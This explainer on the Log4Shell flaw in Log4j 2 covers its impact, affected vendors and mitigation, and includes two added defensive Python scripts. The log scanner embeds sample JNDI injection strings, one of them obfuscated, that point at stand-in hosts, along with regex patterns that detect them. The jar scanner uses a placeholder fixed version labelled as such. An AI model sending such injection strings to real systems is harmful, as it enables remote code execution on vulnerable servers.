The ‘Log4Shell’ vulnerability in the Java-based Log4j library, present in the computing infrastructure of millions of companies worldwide, has been dubbed “a design failure of catastrophic proportions” by security researchers as it continues to cause problems for Big Tech and beyond.
IT teams around the world are scrambling to instate adequate security measures to deal with the onslaught of threat actors looking to exploit it, with some describing it as the worst software flaw to emerge in the wild in over a decade – and perhaps in the history of modern computing.
The good news is that a patch is available to reduce the risk to your business; read on to find out more.
How was the Log4Shell Vulnerability Discovered?
Log4Shell is a vulnerability found in the open-source logging tool Log4J 2. It is a zero-day vulnerability, which means it has only now been spotted but has been exploited for some time.
Log4J is part of a Java-based Apache code library that is present in cloud servers, software, and online services used across all industries and governments. As tools go, it's about as ubiquitous as it can get. Globally, millions of servers have the logging tool installed.
“I've worked in security for 30 years, and always tried to avoid alarmist, ‘the sky is falling’ positions. But now is the time for alarm — the vulnerability known as Log4Shell presents a grave danger to nearly all digital infrastructure.” – Amit Yoran, Tenable CEO
The vulnerability was initially spotted in the game Minecraft. According to the Guardian, users were able to execute commands on other users’ computers by simply posting a message in a chat box.
Why is it so Dangerous?
What makes the exploit so dangerous is not only the degree of control it can grant a malicious actor over a given system, but also that it is just as easy to exploit in other environments and systems as it is in Minecraft.
Log4Shell is classified as a remote code execution (RCE) vulnerability, allowing attackers to run whatever code they want on an affected server. By exploiting the vulnerability, they can reach parts of company networks that aren’t even connected to the internet.
All that is needed is for a specially crafted string (a short piece of text) to be processed by the vulnerable component of Log4J 2, and attackers can do this remotely – ordinary tools such as cURL are enough to deliver the string to a system that will log it.
Once a threat actor breaks in, data can be erased, stolen or changed, malware can be inserted into systems and various other categories of malicious activity can take place.
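Because the attack arrives as text that a vulnerable system logs, one of the first things a defender can do is search existing logs for that text. The following is an added example, not code from the article or from Apache: a small Python scanner that runs over constructed web-server access-log lines and flags the Log4j 2 lookup syntax. The sample lines, the client addresses (documentation range 203.0.113.0/24) and the hostnames (reserved `.invalid` domain) are all made up for the example; the `jndi:` prefix and the `${...}` lookup syntax are the real Log4j 2 features involved.

```python
import re
from typing import Dict, List

# Constructed sample access-log lines (not real traffic). Client addresses use
# the documentation range 203.0.113.0/24 and hostnames the reserved .invalid TLD.
SAMPLE_LOG_LINES = [
    '203.0.113.5 - - [10/Dec/2021:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Dec/2021:10:01:05 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://lookup.invalid/a}"',
    '203.0.113.9 - - [10/Dec/2021:10:01:09 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}ndi:rmi://lookup.invalid/b}"',
    '203.0.113.11 - - [10/Dec/2021:10:02:00 +0000] "GET /?q=price${USD} HTTP/1.1" 200 512 "-" "curl/7.79.1"',
]

# A lookup that names the jndi: prefix directly, in any letter case.
JNDI_LOOKUP_RE = re.compile(r"\$\{[^}]*jndi:", re.IGNORECASE)
# A lookup opened inside another lookup. Log4j 2 resolves the inner one first;
# nesting has no legitimate use in data that arrived from a client, so flag it
# regardless of what the inner lookup resolves to.
NESTED_LOOKUP_RE = re.compile(r"\$\{[^}]*\$\{")
# Any lookup syntax at all in client-supplied data: worth a look, low severity.
ANY_LOOKUP_RE = re.compile(r"\$\{")

HIGH_SEVERITY = {"jndi-lookup", "nested-lookup"}


def classify_line(line: str) -> List[str]:
    """Return the detection reasons that apply to one log line, strongest first."""
    reasons = []
    if JNDI_LOOKUP_RE.search(line):
        reasons.append("jndi-lookup")
    if NESTED_LOOKUP_RE.search(line):
        reasons.append("nested-lookup")
    if ANY_LOOKUP_RE.search(line):
        reasons.append("lookup-syntax")
    return reasons


def severity(reasons: List[str]) -> str:
    """Collapse a reason list to a single triage level."""
    if not reasons:
        return "none"
    return "high" if HIGH_SEVERITY & set(reasons) else "low"


def scan_log(lines: List[str]) -> List[Dict[str, object]]:
    """Scan log lines; return one finding per line that carries lookup syntax."""
    findings = []
    for idx, line in enumerate(lines):
        reasons = classify_line(line)
        if reasons:
            findings.append({"line_no": idx + 1, "severity": severity(reasons), "reasons": reasons})
    return findings


def high_severity_line_numbers(lines: List[str]) -> List[int]:
    """1-based numbers of the lines a responder should look at first."""
    return [f["line_no"] for f in scan_log(lines) if f["severity"] == "high"]


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG_LINES):
        print(finding)
```

Run against the sample, the scanner flags lines 2 and 3 as high severity and line 4 as a low-severity lookup to review. The third pattern is deliberately broad: the point of logging-level detection is to catch the lookup syntax itself rather than one spelling of it, and to feed the flagged hosts into the patching work described later in the article.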
What Services are Affected?
The countries where the attacks appear to be concentrated (measured by the number of exploit attempts blocked) are the United States, the United Kingdom, Germany and Turkey.
Companies, products, and services that have confirmed their systems are vulnerable to the threat include Microsoft, Twitter, Tesla, Google, Amazon, IBM, LinkedIn, Baidu, SolarWinds, Zoho, Cisco (including Webex), Atlassian, and hundreds of thousands of others.
Why is Everybody Panicking?
The ominous answer is, unfortunately, because this is genuinely serious. Not only is the vulnerability very easily exploitable, but because of the dependencies attached to it, fixing it without disrupting other parts of any given system will be difficult.
The vulnerability, worryingly, is now fully weaponized, which means that threat actors are not only exploiting the vulnerability but also actively distributing tools for others to do the same.
Cybersecurity firm Check Point revealed on Monday that, since the weekend, there have been over 830,000 attacks using the exploit. Some hackers are using it to enter vulnerable systems and install malware like Kinsing, which will start mining for cryptocurrency when executed.
Security researchers at Bitdefender have identified the exploit being used to load systems with ransomware from the Khonsari ransomware family.
Other cybersecurity teams have also noticed the vulnerability being exploited to recruit computers into botnets (robot networks) that can be used to orchestrate DDoS attacks.
What Can I Do to Mitigate the Threat to my Business?
If you don’t have some sort of antivirus software installed on your computer or network, now is the time to get it downloaded and kick out any potential network intruders exploiting this issue.
Apache has already released an update that will help shore up the vulnerability. However, because it is so widespread and used in so many systems, security teams are going to be hard pressed to root out all of the instances and patch them.
Regularly scanning for intruders on your computer systems is of paramount importance at present.
Installing this patch is your best line of defence, but if you are part of a business trying to defend itself from this threat and your systems cannot be updated immediately, security firm Cybereason has created a patch that it says disables the vulnerability. You'll need basic Java skills to implement this patch.
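Rooting out every instance is the hard part of the patching work the article describes, and it starts with an inventory. The following is an added example, not code from the article, Apache or Cybereason: a Python script that walks a directory tree, finds `log4j-core` jar files, reads the version each one records and compares it with the fixed version. The article gives no version number, so `FIXED_VERSION` is a labelled placeholder to be set from Apache's advisory; the jar files the demo builds, and the version strings inside them, are constructed for the example. Reading the version from Maven's `pom.properties`, then the manifest's `Implementation-Version`, then the file name is an assumption about how the jars are packaged.

```python
import os
import re
import tempfile
import zipfile
from typing import List, Optional, Tuple

# PLACEHOLDER: the article gives no version number. Set this to the fixed
# log4j-core version named in Apache's advisory before using the scan.
FIXED_VERSION = "2.99.0"

# Assumptions about where the version lives inside a Maven-built jar: the
# pom.properties file written by Maven, then the manifest, then the file name.
POM_PROPERTIES = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
MANIFEST = "META-INF/MANIFEST.MF"
JAR_NAME_RE = re.compile(r"^log4j-core-(\d+(?:\.\d+)*)\.jar$")


def parse_version(text: str) -> Tuple[int, ...]:
    """'2.14.1' -> (2, 14, 1); tuples compare component by component."""
    return tuple(int(part) for part in text.split("."))


def version_from_jar(path: str) -> Optional[str]:
    """Best-effort version of one jar, or None when nothing usable is recorded."""
    try:
        with zipfile.ZipFile(path) as jar:
            names = set(jar.namelist())
            if POM_PROPERTIES in names:
                for line in jar.read(POM_PROPERTIES).decode("utf-8", "replace").splitlines():
                    if line.startswith("version="):
                        return line.split("=", 1)[1].strip()
            if MANIFEST in names:
                for line in jar.read(MANIFEST).decode("utf-8", "replace").splitlines():
                    if line.startswith("Implementation-Version:"):
                        return line.split(":", 1)[1].strip()
    except zipfile.BadZipFile:
        return None
    match = JAR_NAME_RE.match(os.path.basename(path))
    return match.group(1) if match else None


def is_below_fixed(version: str, fixed: str = FIXED_VERSION) -> bool:
    """True when the jar's version is older than the fixed release."""
    return parse_version(version) < parse_version(fixed)


def scan_tree(root: str, fixed: str = FIXED_VERSION) -> List[Tuple[str, str, bool]]:
    """Return (path, version or 'unknown', needs_attention) for each log4j-core jar.

    A jar whose version cannot be read is reported as needing attention rather
    than silently skipped. Jars repackaged inside war/ear files are out of scope.
    """
    findings = []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            if name.startswith("log4j-core") and name.endswith(".jar"):
                path = os.path.join(dirpath, name)
                version = version_from_jar(path)
                needs_attention = version is None or is_below_fixed(version, fixed)
                findings.append((path, version or "unknown", needs_attention))
    return sorted(findings)


def build_demo_tree(root: str) -> None:
    """Write three constructed jars; the version strings are made up for the demo."""
    for version in ("2.1.0", "2.99.0"):
        with zipfile.ZipFile(os.path.join(root, f"log4j-core-{version}.jar"), "w") as jar:
            jar.writestr(POM_PROPERTIES, f"version={version}\n")
    os.makedirs(os.path.join(root, "lib"))
    with zipfile.ZipFile(os.path.join(root, "lib", "log4j-core.jar"), "w") as jar:
        jar.writestr(MANIFEST, "Manifest-Version: 1.0\n")  # no version recorded


def demo() -> List[Tuple[str, str, bool]]:
    """Build the constructed tree in a temp dir, scan it, return relative results."""
    with tempfile.TemporaryDirectory() as root:
        build_demo_tree(root)
        return [(os.path.relpath(p, root), v, flag) for p, v, flag in scan_tree(root)]


if __name__ == "__main__":
    for path, version, needs_attention in demo():
        print(f"{'REVIEW ' if needs_attention else 'ok     '}{version:>8}  {path}")
```

Point `scan_tree` at an application directory and treat every row marked for review as work to schedule: either upgrade to the fixed version or, where that is not yet possible, apply the interim mitigation the article mentions. The threshold is kept as a parameter so the same scan can be rerun against whatever version the current advisory names.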